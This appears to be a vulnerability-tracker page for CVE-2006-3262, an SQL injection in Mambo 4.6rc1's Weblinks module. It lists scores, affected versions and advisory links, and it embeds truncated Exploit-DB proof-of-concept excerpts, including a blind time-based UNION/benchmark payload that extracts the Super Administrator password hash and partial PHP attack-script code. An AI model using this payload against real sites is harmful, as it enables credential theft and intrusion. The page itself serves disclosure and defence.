CVE-2006-3262
published 2006-06-27CVE-2006-3262: SQL injection vulnerability in the Weblinks module (weblinks.php) in Mambo 4.6rc1 and earlier allows remote attackers to execute arbitrary SQL commands via the…
PriorityP343high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
2.44%
82.3th percentile
SQL injection vulnerability in the Weblinks module (weblinks.php) in Mambo 4.6rc1 and earlier allows remote attackers to execute arbitrary SQL commands via the title parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| mambo | mambo | <= 4.6 | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Mambo 4.6rc1 - Weblinks Blind SQL Injection (2)
exploitdb·2006-06-22
CVE-2006-3262 Mambo 4.6rc1 - Weblinks Blind SQL Injection (2)
Mambo 4.6rc1 - Weblinks Blind SQL Injection (2)
---
#!/usr/bin/php -q -d short_open_tag=on
126 ))
{$result.=" .";}
else
{$result.=" ".$string[$i];}
if (strlen(dechex(ord($string[$i])))==2)
{$exa.=" ".dechex(ord($string[$i]));}
else
{$exa.=" 0".dechex(ord($string[$i]));}
$cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
}
return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='') {
$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) {
echo 'No response from '.$host.':'.$port; die;
}
}
else {
$c = preg_match($proxy_regex,$proxy);
if (!$c) {
echo 'Not a valid proxy...';die;
}
$parts=explode(':',$proxy);
echo "Connecting to ".$parts[0].":
Exploit-DB
Mambo 4.6rc1 - Weblinks Blind SQL Injection (1)
exploitdb·2006-06-17
CVE-2006-3262 Mambo 4.6rc1 - Weblinks Blind SQL Injection (1)
Mambo 4.6rc1 - Weblinks Blind SQL Injection (1)
---
#!/usr/bin/php -q -d short_open_tag=on
mysqld --log=mambo.txt
now login, go to "Submit Weblink" feature, in "Name: " field type:
99999' UNION SELECT IF ((ASCII(SUBSTRING(password,1,1))=0) & 1, benchmark(200000000,CHAR(0)),0) FROM mos_users WHERE usertype='Super Administrator'/*
in mambo.txt we have:
13 Query SELECT id FROM mos_weblinks
WHERE title='99999' UNION SELECT IF ((ASCII(SUBSTRING(password,1,1))=0) & 1, benchmark(50000000,CHAR(0)),0) FROM mos_users WHERE usertype='Super Administrator'/*' AND catid='2'
injection is blind but, as you can see, we can you use time delays through Mysql
benchmark() function to ask questions about tables
this works regardless of magic_quotes_gpc settings
*/
error_reporting(0);
ini_set("max_exec
No writeups or analysis indexed.
http://retrogod.altervista.org/mambo_46rc1_sql.htmlhttp://secunia.com/advisories/20745http://securityreason.com/securityalert/1158http://securitytracker.com/id?1016334http://www.mamboserver.com/?option=com_content&task=view&id=207http://www.osvdb.org/26624http://www.securityfocus.com/archive/1/437496/100/100/threadedhttp://www.securityfocus.com/bid/18492http://www.vupen.com/english/advisories/2006/2416http://retrogod.altervista.org/mambo_46rc1_sql.htmlhttp://secunia.com/advisories/20745http://securityreason.com/securityalert/1158http://securitytracker.com/id?1016334http://www.mamboserver.com/?option=com_content&task=view&id=207http://www.osvdb.org/26624http://www.securityfocus.com/archive/1/437496/100/100/threadedhttp://www.securityfocus.com/bid/18492http://www.vupen.com/english/advisories/2006/2416
2006-06-27
Published